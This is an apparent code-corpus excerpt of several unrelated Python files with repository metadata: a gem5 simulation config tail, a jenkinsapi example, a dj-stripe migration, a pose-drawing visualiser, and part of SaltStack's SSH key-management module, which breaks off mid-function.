                        options.ethernet_linkspeed,
                        options.ethernet_linkdelay,
                        options.etherdump);
elif len(bm) == 1:
    root = Root(full_system=True, system=test_sys)
else:
    print("Error I don't know how to create more than 2 systems.")
    sys.exit(1)
if options.timesync:
    root.time_sync_enable = True
if options.frame_capture:
    VncServer.frame_capture = True
if buildEnv['TARGET_ISA'] == "arm" and options.generate_dtb:
    # Sanity checks
    if options.dtb_filename:
        fatal("--generate-dtb and --dtb-filename cannot be specified at the"\
            "same time.")
    if options.machine_type not in ["VExpress_GEM5", "VExpress_GEM5_V1"]:
        warn("Can only correctly generate a dtb for VExpress_GEM5_V1 " \
             "platforms, unless custom hardware models have been equipped "\
             "with generation functionality.")
    # Generate a Device Tree
    def create_dtb_for_system(system, filename):
        # Build an FDT from the system description and write it to outdir;
        # returns the path of the generated .dtb file.
        state = FdtState(addr_cells=2, size_cells=2, cpu_cells=1)
        rootNode = system.generateDeviceTree(state)
        fdt = Fdt()
        fdt.add_rootnode(rootNode)
        dtb_filename = os.path.join(m5.options.outdir, filename)
        return fdt.writeDtbFile(dtb_filename)
    for sysname in ('system', 'testsys', 'drivesys'):
        if hasattr(root, sysname):
            # NOTE(review): this local `sys` shadows the imported sys module
            # for the remainder of the file — confirm nothing below needs it.
            sys = getattr(root, sysname)
            sys.dtb_filename = create_dtb_for_system(sys, '%s.dtb' % sysname)
Simulation.setWorkCountOptions(test_sys, options)
Simulation.run(options, root, test_sys, FutureClass)
| 41.310777 | 87 | 0.668022 |
433574e3ad7cb394257ec617aa8d7eddc16c97a1 | 411 | py | Python | examples/how_to/get_version_info_from_last_good_build.py | tuenti/jenkinsapi | 52548695da01bd431a6f9fc3c46f7ff42922af39 | [
"MIT"
] | null | null | null | examples/how_to/get_version_info_from_last_good_build.py | tuenti/jenkinsapi | 52548695da01bd431a6f9fc3c46f7ff42922af39 | [
"MIT"
] | null | null | null | examples/how_to/get_version_info_from_last_good_build.py | tuenti/jenkinsapi | 52548695da01bd431a6f9fc3c46f7ff42922af39 | [
"MIT"
] | 1 | 2019-12-08T16:20:22.000Z | 2019-12-08T16:20:22.000Z | """
Extract version information from the latest build.
"""
from jenkinsapi.jenkins import Jenkins
def getSCMInfroFromLatestGoodBuild(url, jobName, username=None, password=None):
    """Return the SCM revision of the last successful build of *jobName*.

    Connects to the Jenkins instance at *url* (optionally authenticated with
    *username*/*password*), looks up the job and returns the revision of its
    last good build.
    """
    J = Jenkins(url, username, password)
    job = J[jobName]
    lgb = job.get_last_good_build()
    return lgb.get_revision()


if __name__ == '__main__':
    # Fixed: the original used a Python 2 print *statement*, which is a
    # SyntaxError under Python 3.
    print(getSCMInfroFromLatestGoodBuild('http://localhost:8080', 'fooJob'))
| 29.357143 | 79 | 0.739659 |
276c0039a116e6b116726f17dc5b6aa9fe574fdf | 610 | py | Python | djstripe/migrations/0012_account_djstripe_owner_account.py | TenantBase/dj-stripe | c3fe9da9dd0e15fd714c95402b7672aac07d43e1 | [
"MIT"
] | null | null | null | djstripe/migrations/0012_account_djstripe_owner_account.py | TenantBase/dj-stripe | c3fe9da9dd0e15fd714c95402b7672aac07d43e1 | [
"MIT"
] | null | null | null | djstripe/migrations/0012_account_djstripe_owner_account.py | TenantBase/dj-stripe | c3fe9da9dd0e15fd714c95402b7672aac07d43e1 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.11 on 2022-02-02 19:12
from django.conf import settings
from django.db import migrations
import django.db.models.deletion
import djstripe.fields
class Migration(migrations.Migration):
    """Auto-generated migration: add Account.djstripe_owner_account, a
    self-referential foreign key recording which Stripe account owns this
    Account row."""

    dependencies = [
        ('djstripe', '0011_2_7'),
    ]

    operations = [
        migrations.AddField(
            model_name='account',
            name='djstripe_owner_account',
            # Nullable so existing rows migrate without a default value;
            # deleting the owner cascades. The FK target field is taken from
            # the DJSTRIPE_FOREIGN_KEY_TO_FIELD setting.
            field=djstripe.fields.StripeForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='djstripe.account', to_field=settings.DJSTRIPE_FOREIGN_KEY_TO_FIELD),
        ),
    ]
| 27.727273 | 191 | 0.693443 |
a953834e2af3abb629ef0d9898fa39dfdb3dfe9b | 8,187 | py | Python | vision/visualizer_human.py | yihui-he2020/epipolar-transformers | 6824f4345b2998500fbacd0f4e30f67f8e3da7b8 | [
"MIT"
] | 360 | 2020-03-30T07:15:45.000Z | 2022-03-04T14:08:04.000Z | vision/visualizer_human.py | yihui-he2020/epipolar-transformers | 6824f4345b2998500fbacd0f4e30f67f8e3da7b8 | [
"MIT"
] | 30 | 2020-05-12T11:12:20.000Z | 2021-12-31T05:49:10.000Z | vision/visualizer_human.py | yihui-he2020/epipolar-transformers | 6824f4345b2998500fbacd0f4e30f67f8e3da7b8 | [
"MIT"
] | 38 | 2020-05-12T05:33:46.000Z | 2022-01-25T22:27:45.000Z | import numpy as np
import scipy.ndimage
import skimage
import cv2
import torch
import matplotlib
from matplotlib import pylab as plt
# from mpl_toolkits.mplot3d import axes3d, Axes3D
# matplotlib.use('Agg')
# Skeleton bone lists per dataset convention: each entry is a
# (joint_from, joint_to) index pair into the keypoints array.
CONNECTIVITY_DICT = {
    'cmu': [(0, 2), (0, 9), (1, 0), (1, 17), (2, 12), (3, 0), (4, 3), (5, 4), (6, 2), (7, 6), (8, 7), (9, 10), (10, 11), (12, 13), (13, 14), (15, 1), (16, 15), (17, 18)],
    'coco': [(0, 1), (0, 2), (1, 3), (2, 4), (5, 7), (7, 9), (6, 8), (8, 10), (11, 13), (13, 15), (12, 14), (14, 16), (5, 6), (5, 11), (6, 12), (11, 12)],
    "mpii": [(0, 1), (1, 2), (2, 6), (5, 4), (4, 3), (3, 6), (6, 7), (7, 8), (8, 9), (8, 12), (8, 13), (10, 11), (11, 12), (13, 14), (14, 15)],
    "human36m": [
        (0, 1), (0, 4),  # root hip
        (1, 2), (4, 5),  # hip knee
        (2, 3), (5, 6),  # knee ankle
        (0, 7),  # root belly
        (7, 8),  # belly neck
        (8, 9),  # neck nose
        (9, 10),  # nose head
        (8, 11), (8, 14),  # neck shoulder
        (11, 12), (14, 15),  # shoulder elbow
        (12, 13), (15, 16),  # elbow wrist
    ],
    "kth": [(0, 1), (1, 2), (5, 4), (4, 3), (6, 7), (7, 8), (11, 10), (10, 9), (2, 3), (3, 9), (2, 8), (9, 12), (8, 12), (12, 13)],
}

# Per-bone colors (0-255 channel values), parallel to the bone lists in
# CONNECTIVITY_DICT for the same convention key.
COLOR_DICT = {
    'coco': [
        (102, 0, 153), (153, 0, 102), (51, 0, 153), (153, 0, 153),  # head
        (51, 153, 0), (0, 153, 0),  # left arm
        (153, 102, 0), (153, 153, 0),  # right arm
        (0, 51, 153), (0, 0, 153),  # left leg
        (0, 153, 102), (0, 153, 153),  # right leg
        (153, 0, 0), (153, 0, 0), (153, 0, 0), (153, 0, 0)  # body
    ],

    'human36m': [
        (0, 153, 102), (0, 153, 153), (0, 153, 153),  # right leg
        (0, 51, 153), (0, 0, 153), (0, 0, 153),  # left leg
        (153, 0, 0), (153, 0, 0),  # body
        (153, 0, 102), (153, 0, 102),  # head
        (153, 153, 0), (153, 153, 0), (153, 102, 0),  # right arm
        (0, 153, 0), (0, 153, 0), (51, 153, 0)  # left arm
    ],

    'kth': [
        (0, 153, 102), (0, 153, 153),  # right leg
        (0, 51, 153), (0, 0, 153),  # left leg
        (153, 102, 0), (153, 153, 0),  # right arm
        (51, 153, 0), (0, 153, 0),  # left arm
        (153, 0, 0), (153, 0, 0), (153, 0, 0), (153, 0, 0), (153, 0, 0),  # body
        (102, 0, 153)  # head
    ]
}

# Human-readable joint names per convention (joint index -> name).
JOINT_NAMES_DICT = {
    'coco': {
        0: "nose",
        1: "left_eye",
        2: "right_eye",
        3: "left_ear",
        4: "right_ear",
        5: "left_shoulder",
        6: "right_shoulder",
        7: "left_elbow",
        8: "right_elbow",
        9: "left_wrist",
        10: "right_wrist",
        11: "left_hip",
        12: "right_hip",
        13: "left_knee",
        14: "right_knee",
        15: "left_ankle",
        16: "right_ankle"
    }
}
def draw_2d_pose(keypoints, ax, kind='human36m', keypoints_mask=None, point_size=8, line_width=3, radius=None, color=None):
    """
    Visualizes a 2d skeleton

    Args
        keypoints numpy array of shape (19, 2): pose to draw in CMU format.
        ax: matplotlib axis to draw on
        kind: skeleton convention key into CONNECTIVITY_DICT / COLOR_DICT
        keypoints_mask: optional per-joint booleans; masked-out joints and
            their bones are skipped
    """
    connectivity = CONNECTIVITY_DICT[kind]

    # NOTE(review): this default is immediately overwritten inside the loop
    # below, so the `color` parameter currently has no effect — confirm
    # whether it should override COLOR_DICT.
    color = 'blue' if color is None else color

    if keypoints_mask is None:
        keypoints_mask = [True] * len(keypoints)

    # connections: one colored segment per skeleton bone
    for i, (index_from, index_to) in enumerate(connectivity):
        if kind in COLOR_DICT:
            color = COLOR_DICT[kind][i]
        else:
            color = (0, 0, 255)  # fallback color for unknown conventions
        if keypoints_mask[index_from] and keypoints_mask[index_to]:
            xs, ys = [np.array([keypoints[index_from, j], keypoints[index_to, j]]) for j in range(2)]
            # COLOR_DICT values are 0-255; matplotlib expects 0-1 floats.
            ax.plot(xs, ys, c=[c / 255. for c in color], lw=line_width, zorder=1)

    # points: draw the joints on top of the bones (zorder=2)
    ax.scatter(keypoints[keypoints_mask][:, 0], keypoints[keypoints_mask][:, 1], c='red', s=point_size, zorder=2)

    # if radius is not None:
    #     root_keypoint_index = 0
    #     xroot, yroot = keypoints[root_keypoint_index, 0], keypoints[root_keypoint_index, 1]

    #     ax.set_xlim([-radius + xroot, radius + xroot])
    #     ax.set_ylim([-radius + yroot, radius + yroot])

    # ax.set_aspect('equal')
def draw_2d_pose_cv2(keypoints, canvas, kind='cmu', keypoints_mask=None, point_size=2, point_color=(255, 255, 255), line_width=1, radius=None, color=None, anti_aliasing_scale=1):
    """
    Draw a 2d skeleton onto an image with OpenCV and return a new canvas;
    the input image is not modified.

    Drawing happens on a copy enlarged by ``anti_aliasing_scale`` which is
    resized back at the end, giving cheap anti-aliasing.

    NOTE(review): as in draw_2d_pose, ``color`` and ``radius`` appear to
    have no effect — confirm before relying on them.
    """
    canvas = canvas.copy()
    shape = np.array(canvas.shape[:2])
    new_shape = shape * anti_aliasing_scale
    canvas = resize_image(canvas, tuple(new_shape))
    # scale the pose and the stroke sizes together with the canvas
    keypoints = keypoints * anti_aliasing_scale
    point_size = point_size * anti_aliasing_scale
    line_width = line_width * anti_aliasing_scale
    connectivity = CONNECTIVITY_DICT[kind]
    color = 'blue' if color is None else color
    if keypoints_mask is None:
        keypoints_mask = [True] * len(keypoints)
    # connections
    for i, (index_from, index_to) in enumerate(connectivity):
        if keypoints_mask[index_from] and keypoints_mask[index_to]:
            pt_from = tuple(np.array(keypoints[index_from, :]).astype(int))
            pt_to = tuple(np.array(keypoints[index_to, :]).astype(int))
            # per-bone palette when available, otherwise a flat fallback
            if kind in COLOR_DICT:
                color = COLOR_DICT[kind][i]
            else:
                color = (0, 0, 255)
            cv2.line(canvas, pt_from, pt_to, color=color, thickness=line_width)
    if kind == 'coco':
        # COCO has no neck joint: draw an extra bone from the nose to the
        # midpoint between the two shoulders (indices 5 and 6)
        mid_collarbone = (keypoints[5, :] + keypoints[6, :]) / 2
        nose = keypoints[0, :]
        pt_from = tuple(np.array(nose).astype(int))
        pt_to = tuple(np.array(mid_collarbone).astype(int))
        if kind in COLOR_DICT:
            color = (153, 0, 51)
        else:
            color = (0, 0, 255)
        cv2.line(canvas, pt_from, pt_to, color=color, thickness=line_width)
    # points (filled circles, thickness=-1)
    for pt in keypoints[keypoints_mask]:
        cv2.circle(canvas, tuple(pt.astype(int)), point_size, color=point_color, thickness=-1)
    canvas = resize_image(canvas, tuple(shape))
    return canvas
def draw_3d_pose(keypoints, ax, keypoints_mask=None, kind='cmu', radius=None, root=None, point_size=2, line_width=2, draw_connections=True):
    """
    Draw a 3d skeleton on a matplotlib 3d axis.

    Args
        keypoints: numpy array of 3d joint positions, indexed per ``kind``
        ax: mpl_toolkits 3d axis to draw on
        keypoints_mask: optional per-joint boolean mask
        radius / root: when radius is given, the axis limits are centered
            on ``root`` (defaults to the keypoint centroid) with half-width
            ``radius``
        draw_connections: when False only the joints are scattered
    """
    connectivity = CONNECTIVITY_DICT[kind]
    if keypoints_mask is None:
        keypoints_mask = [True] * len(keypoints)
    if draw_connections:
        # Make connection matrix
        for i, joint in enumerate(connectivity):
            if keypoints_mask[joint[0]] and keypoints_mask[joint[1]]:
                xs, ys, zs = [np.array([keypoints[joint[0], j], keypoints[joint[1], j]]) for j in range(3)]
                if kind in COLOR_DICT:
                    color = COLOR_DICT[kind][i]
                else:
                    color = (0, 0, 255)
                # 0-255 triple -> 0-1 floats for matplotlib
                color = np.array(color) / 255
                ax.plot(xs, ys, zs, lw=line_width, c=color)
        if kind == 'coco':
            # COCO has no neck joint: extra bone nose -> shoulder midpoint
            mid_collarbone = (keypoints[5, :] + keypoints[6, :]) / 2
            nose = keypoints[0, :]
            xs, ys, zs = [np.array([nose[j], mid_collarbone[j]]) for j in range(3)]
            if kind in COLOR_DICT:
                color = (153, 0, 51)
            else:
                color = (0, 0, 255)
            color = np.array(color) / 255
            ax.plot(xs, ys, zs, lw=line_width, c=color)
    ax.scatter(keypoints[keypoints_mask][:, 0], keypoints[keypoints_mask][:, 1], keypoints[keypoints_mask][:, 2],
               s=point_size, c=np.array([230, 145, 56])/255, edgecolors='black')  # np.array([230, 145, 56])/255
    if radius is not None:
        if root is None:
            root = np.mean(keypoints, axis=0)
        xroot, yroot, zroot = root
        ax.set_xlim([-radius + xroot, radius + xroot])
        ax.set_ylim([-radius + yroot, radius + yroot])
        ax.set_zlim([-radius + zroot, radius + zroot])
    ax.set_aspect('equal')
    # Get rid of the panes
    background_color = np.array([252, 252, 252]) / 255
    ax.w_xaxis.set_pane_color(background_color)
    ax.w_yaxis.set_pane_color(background_color)
    ax.w_zaxis.set_pane_color(background_color)
    # Get rid of the ticks
    ax.set_xticklabels([])
    ax.set_yticklabels([])
    ax.set_zticklabels([])
if __name__ == '__main__':
    # Smoke test: draw a degenerate 17-joint pose (all coordinates = 1).
    fig = plt.figure()
    ax = fig.add_subplot(111)
    draw_2d_pose(np.ones((17, 2)), ax)
db5431a85aa344517332f5ef184d8d161f711a87 | 38,190 | py | Python | salt/modules/ssh.py | borgstrom/salt | 2f732b5e8cd0b2a13f133d02f70aba3ee9fc0169 | [
"Apache-2.0"
] | null | null | null | salt/modules/ssh.py | borgstrom/salt | 2f732b5e8cd0b2a13f133d02f70aba3ee9fc0169 | [
"Apache-2.0"
] | null | null | null | salt/modules/ssh.py | borgstrom/salt | 2f732b5e8cd0b2a13f133d02f70aba3ee9fc0169 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
'''
Manage client ssh components
.. note:: This module requires the use of MD5 hashing. Certain
security audits may not permit the use of MD5. For those cases,
this module should be disabled or removed.
'''
from __future__ import absolute_import
# Import python libs
import base64
import binascii
import hashlib
import logging
import os
import re
import subprocess
# Import salt libs
import salt.utils
import salt.utils.decorators as decorators
from salt.exceptions import (
    SaltInvocationError,
    CommandExecutionError,
)
from salt.ext.six.moves import range
log = logging.getLogger(__name__)
DEFAULT_SSH_PORT = 22
def __virtual__():
    '''
    Load everywhere except Windows.

    TODO: This could work on windows with some love
    '''
    if not salt.utils.is_windows():
        return True
    return (False, 'The module cannot be loaded on windows.')
def _refine_enc(enc):
'''
Return the properly formatted ssh value for the authorized encryption key
type. ecdsa defaults to 256 bits, must give full ecdsa enc schema string
if using higher enc. If the type is not found, raise CommandExecutionError.
'''
rsa = ['r', 'rsa', 'ssh-rsa']
dss = ['d', 'dsa', 'dss', 'ssh-dss']
ecdsa = ['e', 'ecdsa', 'ecdsa-sha2-nistp521', 'ecdsa-sha2-nistp384',
'ecdsa-sha2-nistp256']
ed25519 = ['ed25519', 'ssh-ed25519']
if enc in rsa:
return 'ssh-rsa'
elif enc in dss:
return 'ssh-dss'
elif enc in ecdsa:
# ecdsa defaults to ecdsa-sha2-nistp256
# otherwise enc string is actual encoding string
if enc in ['e', 'ecdsa']:
return 'ecdsa-sha2-nistp256'
return enc
elif enc in ed25519:
return 'ssh-ed25519'
else:
raise CommandExecutionError(
'Incorrect encryption key type \'{0}\'.'.format(enc)
)
def _format_auth_line(key, enc, comment, options):
'''
Properly format user input.
'''
line = ''
if options:
line += '{0} '.format(','.join(options))
line += '{0} {1} {2}\n'.format(enc, key, comment)
return line
def _expand_authorized_keys_path(path, user, home):
'''
Expand the AuthorizedKeysFile expression. Defined in man sshd_config(5)
'''
converted_path = ''
had_escape = False
for char in path:
if had_escape:
had_escape = False
if char == '%':
converted_path += '%'
elif char == 'u':
converted_path += user
elif char == 'h':
converted_path += home
else:
error = 'AuthorizedKeysFile path: unknown token character "%{0}"'.format(char)
raise CommandExecutionError(error)
continue
elif char == '%':
had_escape = True
else:
converted_path += char
if had_escape:
error = "AuthorizedKeysFile path: Last character can't be escape character"
raise CommandExecutionError(error)
return converted_path
def _get_config_file(user, config):
    '''
    Get absolute path to a user's ssh_config.

    Relative ``config`` paths are resolved against the user's home
    directory, and sshd_config-style %u/%h/%% tokens are expanded.
    Raises CommandExecutionError if the user does not exist.
    '''
    uinfo = __salt__['user.info'](user)
    if not uinfo:
        raise CommandExecutionError('User \'{0}\' does not exist'.format(user))
    home = uinfo['home']
    if not os.path.isabs(config):
        config = os.path.join(home, config)
    config = _expand_authorized_keys_path(config, user, home)
    return config
def _replace_auth_key(
        user,
        key,
        enc='ssh-rsa',
        comment='',
        options=None,
        config='.ssh/authorized_keys'):
    '''
    Replace an existing key in the user's authorized_keys file in place:
    every line carrying the same key material is rewritten with the new
    enc/comment/options.  Raises CommandExecutionError on I/O problems.
    '''
    auth_line = _format_auth_line(key, enc, comment, options or [])
    lines = []
    full = _get_config_file(user, config)
    try:
        # open the file for both reading AND writing
        with salt.utils.fopen(full, 'r') as _fh:
            for line in _fh:
                if line.startswith('#'):
                    # Commented Line
                    lines.append(line)
                    continue
                comps = line.split()
                if len(comps) < 2:
                    # Not a valid line
                    lines.append(line)
                    continue
                # the key field is normally second, but when the line
                # starts with an options field it is third
                key_ind = 1
                if comps[0][:4:] not in ['ssh-', 'ecds']:
                    key_ind = 2
                if comps[key_ind] == key:
                    lines.append(auth_line)
                else:
                    lines.append(line)
            # redundant: the with-block closes the file anyway
            _fh.close()
        # Re-open the file writable after properly closing it
        with salt.utils.fopen(full, 'w') as _fh:
            # Write out any changes
            _fh.writelines(lines)
    except (IOError, OSError) as exc:
        raise CommandExecutionError(
            'Problem reading or writing to key file: {0}'.format(exc)
        )
def _validate_keys(key_file):
    '''
    Return a dict containing validated keys in the passed file.

    Keys of the dict are the base64 key material; values carry the
    ``enc`` type, ``comment``, ``options`` list and md5 ``fingerprint``.
    Lines that do not parse or whose key is not valid base64 are skipped.
    Raises CommandExecutionError when the file cannot be read.
    '''
    ret = {}
    # group 1: optional leading options field; group 2: "enc key [comment]"
    linere = re.compile(r'^(.*?)\s?((?:ssh\-|ecds)[\w-]+\s.+)$')
    try:
        with salt.utils.fopen(key_file, 'r') as _fh:
            for line in _fh:
                if line.startswith('#'):
                    # Commented Line
                    continue
                # get "{options} key"
                search = re.search(linere, line)
                if not search:
                    # not an auth ssh key, perhaps a blank line
                    continue
                opts = search.group(1)
                comps = search.group(2).split()
                if len(comps) < 2:
                    # Not a valid line
                    continue
                if opts:
                    # It has options, grab them
                    options = opts.split(',')
                else:
                    options = []
                enc = comps[0]
                key = comps[1]
                comment = ' '.join(comps[2:])
                fingerprint = _fingerprint(key)
                if fingerprint is None:
                    # key material is not valid base64; skip it
                    continue
                ret[key] = {'enc': enc,
                            'comment': comment,
                            'options': options,
                            'fingerprint': fingerprint}
    except (IOError, OSError):
        raise CommandExecutionError(
            'Problem reading ssh key file {0}'.format(key_file)
        )
    return ret
def _fingerprint(public_key):
'''
Return a public key fingerprint based on its base64-encoded representation
The fingerprint string is formatted according to RFC 4716 (ch.4), that is,
in the form "xx:xx:...:xx"
If the key is invalid (incorrect base64 string), return None
'''
try:
raw_key = public_key.decode('base64')
except binascii.Error:
return None
ret = hashlib.md5(raw_key).hexdigest()
chunks = [ret[i:i + 2] for i in range(0, len(ret), 2)]
return ':'.join(chunks)
def _get_known_hosts_file(config=None, user=None):
    '''
    Return the absolute path of the known_hosts file to operate on, or an
    error dict ({'status': 'error', 'error': ...}) when it cannot be
    determined.

    With a user, ``config`` defaults to ``.ssh/known_hosts`` relative to
    that user's home; without one it defaults to the system-wide
    ``/etc/ssh/ssh_known_hosts`` and must be absolute.
    '''
    if user:
        config = config or '.ssh/known_hosts'
    else:
        config = config or '/etc/ssh/ssh_known_hosts'
    if os.path.isabs(config):
        full = config
    else:
        if user:
            uinfo = __salt__['user.info'](user)
            if not uinfo:
                return {'status': 'error',
                        'error': 'User {0} does not exist'.format(user)}
            full = os.path.join(uinfo['home'], config)
        else:
            # no user to resolve a relative path against
            return {
                'status': 'error',
                'error': 'Cannot determine absolute path to file.'
            }
    return full
def host_keys(keydir=None, private=True):
    '''
    Return the minion's host keys

    keydir
        directory scanned for ``ssh_host_*`` files; defaults to /etc/ssh
        on Linux and is required on other platforms

    private : True
        when False, private key files (those without a ``.pub`` suffix)
        are skipped

    CLI Example:

    .. code-block:: bash

        salt '*' ssh.host_keys
        salt '*' ssh.host_keys keydir=/etc/ssh
        salt '*' ssh.host_keys keydir=/etc/ssh private=False
    '''
    # TODO: support parsing sshd_config for the key directory
    if not keydir:
        if __grains__['kernel'] == 'Linux':
            keydir = '/etc/ssh'
        else:
            # If keydir is None, os.listdir() will blow up
            raise SaltInvocationError('ssh.host_keys: Please specify a keydir')
    keys = {}
    for fn_ in os.listdir(keydir):
        if fn_.startswith('ssh_host_'):
            if fn_.endswith('.pub') is False and private is False:
                log.info('Skipping private key file {0} as private is set to False'.format(fn_))
                continue
            # 'ssh_host_rsa_key.pub' -> kname 'rsa.pub'
            top = fn_.split('.')
            comps = top[0].split('_')
            kname = comps[2]
            if len(top) > 1:
                kname += '.{0}'.format(top[1])
            try:
                with salt.utils.fopen(os.path.join(keydir, fn_), 'r') as _fh:
                    # As of RFC 4716 "a key file is a text file, containing a sequence of lines",
                    # although some SSH implementations (e.g. OpenSSH) manage their own format(s).
                    # Please see #20708 for a discussion about how to handle SSH key files in the future
                    keys[kname] = _fh.readline()
                    # only read the whole file if it is not in the legacy 1.1 binary format
                    if keys[kname] != "SSH PRIVATE KEY FILE FORMAT 1.1\n":
                        keys[kname] += _fh.read()
                    keys[kname] = keys[kname].strip()
            except (IOError, OSError):
                # unreadable file: report the key as empty
                keys[kname] = ''
    return keys
def auth_keys(user=None, config='.ssh/authorized_keys'):
    '''
    Return the authorized keys for users

    With a single user the flat key dict is returned directly (historical
    output shape); with a list (or no user, meaning all users) the result
    is keyed by user name.

    CLI Example:

    .. code-block:: bash

        salt '*' ssh.auth_keys
        salt '*' ssh.auth_keys root
        salt '*' ssh.auth_keys user=root
        salt '*' ssh.auth_keys user="[user1, user2]"
    '''
    if not user:
        user = __salt__['user.list_users']()
    old_output_when_one_user = False
    if not isinstance(user, list):
        user = [user]
        old_output_when_one_user = True
    keys = {}
    for u in user:
        full = None
        try:
            full = _get_config_file(u, config)
        except CommandExecutionError:
            # nonexistent user: silently omit from the result
            pass
        if full and os.path.isfile(full):
            keys[u] = _validate_keys(full)
    if old_output_when_one_user:
        if user[0] in keys:
            return keys[user[0]]
        else:
            return {}
    return keys
def check_key_file(user,
                   source,
                   config='.ssh/authorized_keys',
                   saltenv='base',
                   env=None):
    '''
    Check a keyfile from a source destination against the local keys and
    return the keys to change

    Returns a dict mapping each key in the source file to the result of
    :py:func:`check_key` ("update", "add" or "exists"), or an empty dict
    when the source cannot be cached or contains no valid keys.

    CLI Example:

    .. code-block:: bash

        salt '*' ssh.check_key_file root salt://ssh/keyfile
    '''
    if env is not None:
        salt.utils.warn_until(
            'Boron',
            'Passing a salt environment should be done using \'saltenv\' '
            'not \'env\'. This functionality will be removed in Salt Boron.'
        )
        # Backwards compatibility
        saltenv = env
    keyfile = __salt__['cp.cache_file'](source, saltenv)
    if not keyfile:
        return {}
    s_keys = _validate_keys(keyfile)
    if not s_keys:
        err = 'No keys detected in {0}. Is file properly ' \
              'formatted?'.format(source)
        log.error(err)
        __context__['ssh_auth.error'] = err
        return {}
    else:
        ret = {}
        for key in s_keys:
            ret[key] = check_key(
                user,
                key,
                s_keys[key]['enc'],
                s_keys[key]['comment'],
                s_keys[key]['options'],
                config)
        return ret
def check_key(user, key, enc, comment, options, config='.ssh/authorized_keys',
              cache_keys=None):
    '''
    Check to see if a key needs updating, returns "update", "add" or "exists"

    "update" means the key exists but with different enc/comment/options;
    "add" means it is absent; "exists" means it matches exactly.

    CLI Example:

    .. code-block:: bash

        salt '*' ssh.check_key <user> <key> <enc> <comment> <options>
    '''
    if cache_keys is None:
        cache_keys = []
    enc = _refine_enc(enc)
    current = auth_keys(user, config)
    nline = _format_auth_line(key, enc, comment, options)
    # Removing existing keys from the auth_keys isn't really a good idea
    # in fact
    #
    # as:
    #   - We can have non-salt managed keys in that file
    #   - We can have multiple states defining keys for an user
    #     and with such code only one state will win
    #     the remove all-other-keys war
    #
    # if cache_keys:
    #     for pub_key in set(current).difference(set(cache_keys)):
    #         rm_auth_key(user, pub_key)
    if key in current:
        cline = _format_auth_line(key,
                                  current[key]['enc'],
                                  current[key]['comment'],
                                  current[key]['options'])
        if cline != nline:
            return 'update'
    else:
        return 'add'
    return 'exists'
def rm_auth_key_from_file(user,
                          source,
                          config='.ssh/authorized_keys',
                          saltenv='base',
                          env=None):
    '''
    Remove an authorized key from the specified user's authorized key file, using a file as source

    Every key found in the cached source file is removed via
    :py:func:`rm_auth_key`; the aggregated result string is returned.

    CLI Example:

    .. code-block:: bash

        salt '*' ssh.rm_auth_key_from_file <user> salt://ssh_keys/<user>.id_rsa.pub
    '''
    if env is not None:
        salt.utils.warn_until(
            'Boron',
            'Passing a salt environment should be done using \'saltenv\' '
            'not \'env\'. This functionality will be removed in Salt Boron.'
        )
        # Backwards compatibility
        saltenv = env
    lfile = __salt__['cp.cache_file'](source, saltenv)
    if not os.path.isfile(lfile):
        raise CommandExecutionError(
            'Failed to pull key file from salt file server'
        )
    s_keys = _validate_keys(lfile)
    if not s_keys:
        err = (
            'No keys detected in {0}. Is file properly formatted?'.format(
                source
            )
        )
        log.error(err)
        __context__['ssh_auth.error'] = err
        return 'fail'
    else:
        rval = ''
        for key in s_keys:
            rval += rm_auth_key(
                user,
                key,
                config
            )
        # Due to the ability for a single file to have multiple keys, it's
        # possible for a single call to this function to have both "replace"
        # and "new" as possible valid returns. I ordered the following as I
        # thought best.
        if 'Key not removed' in rval:
            return 'Key not removed'
        elif 'Key removed' in rval:
            return 'Key removed'
        else:
            return 'Key not present'
def rm_auth_key(user, key, config='.ssh/authorized_keys'):
    '''
    Remove an authorized key from the specified user's authorized key file

    Returns a status string: 'Key removed', 'Key not removed' (I/O
    failure), 'Key not present', or a message when the file is missing.

    CLI Example:

    .. code-block:: bash

        salt '*' ssh.rm_auth_key <user> <key>
    '''
    current = auth_keys(user, config)
    linere = re.compile(r'^(.*?)\s?((?:ssh\-|ecds)[\w-]+\s.+)$')
    if key in current:
        # Remove the key
        full = _get_config_file(user, config)
        # Return something sensible if the file doesn't exist
        if not os.path.isfile(full):
            return 'Authorized keys file {0} not present'.format(full)
        lines = []
        try:
            # Read every line in the file to find the right ssh key
            # and then write out the correct one. Open the file once
            with salt.utils.fopen(full, 'r') as _fh:
                for line in _fh:
                    if line.startswith('#'):
                        # Commented Line
                        lines.append(line)
                        continue
                    # get "{options} key"
                    search = re.search(linere, line)
                    if not search:
                        # not an auth ssh key, perhaps a blank line
                        # NOTE(review): such lines are dropped (not
                        # re-appended), so blank lines disappear from the
                        # rewritten file — confirm this is intended
                        continue
                    comps = search.group(2).split()
                    if len(comps) < 2:
                        # Not a valid line
                        lines.append(line)
                        continue
                    pkey = comps[1]
                    # This is the key we are "deleting", so don't put
                    # it in the list of keys to be re-added back
                    if pkey == key:
                        continue
                    lines.append(line)
            # Let the context manager do the right thing here and then
            # re-open the file in write mode to save the changes out.
            with salt.utils.fopen(full, 'w') as _fh:
                _fh.writelines(lines)
        except (IOError, OSError) as exc:
            log.warn('Could not read/write key file: {0}'.format(str(exc)))
            return 'Key not removed'
        return 'Key removed'
    # TODO: Should this function return a simple boolean?
    return 'Key not present'
def set_auth_key_from_file(user,
                           source,
                           config='.ssh/authorized_keys',
                           saltenv='base',
                           env=None):
    '''
    Add a key to the authorized_keys file, using a file as the source.

    Every key found in the cached source file is applied via
    :py:func:`set_auth_key`; the strongest outcome of the batch is
    returned ('fail' > 'replace' > 'new' > 'no change').

    CLI Example:

    .. code-block:: bash

        salt '*' ssh.set_auth_key_from_file <user> salt://ssh_keys/<user>.id_rsa.pub
    '''
    if env is not None:
        salt.utils.warn_until(
            'Boron',
            'Passing a salt environment should be done using \'saltenv\' '
            'not \'env\'. This functionality will be removed in Salt Boron.'
        )
        # Backwards compatibility
        saltenv = env
    # TODO: add support for pulling keys from other file sources as well
    lfile = __salt__['cp.cache_file'](source, saltenv)
    if not os.path.isfile(lfile):
        raise CommandExecutionError(
            'Failed to pull key file from salt file server'
        )
    s_keys = _validate_keys(lfile)
    if not s_keys:
        err = (
            'No keys detected in {0}. Is file properly formatted?'.format(
                source
            )
        )
        log.error(err)
        __context__['ssh_auth.error'] = err
        return 'fail'
    else:
        rval = ''
        for key in s_keys:
            rval += set_auth_key(
                user,
                key,
                s_keys[key]['enc'],
                s_keys[key]['comment'],
                s_keys[key]['options'],
                config,
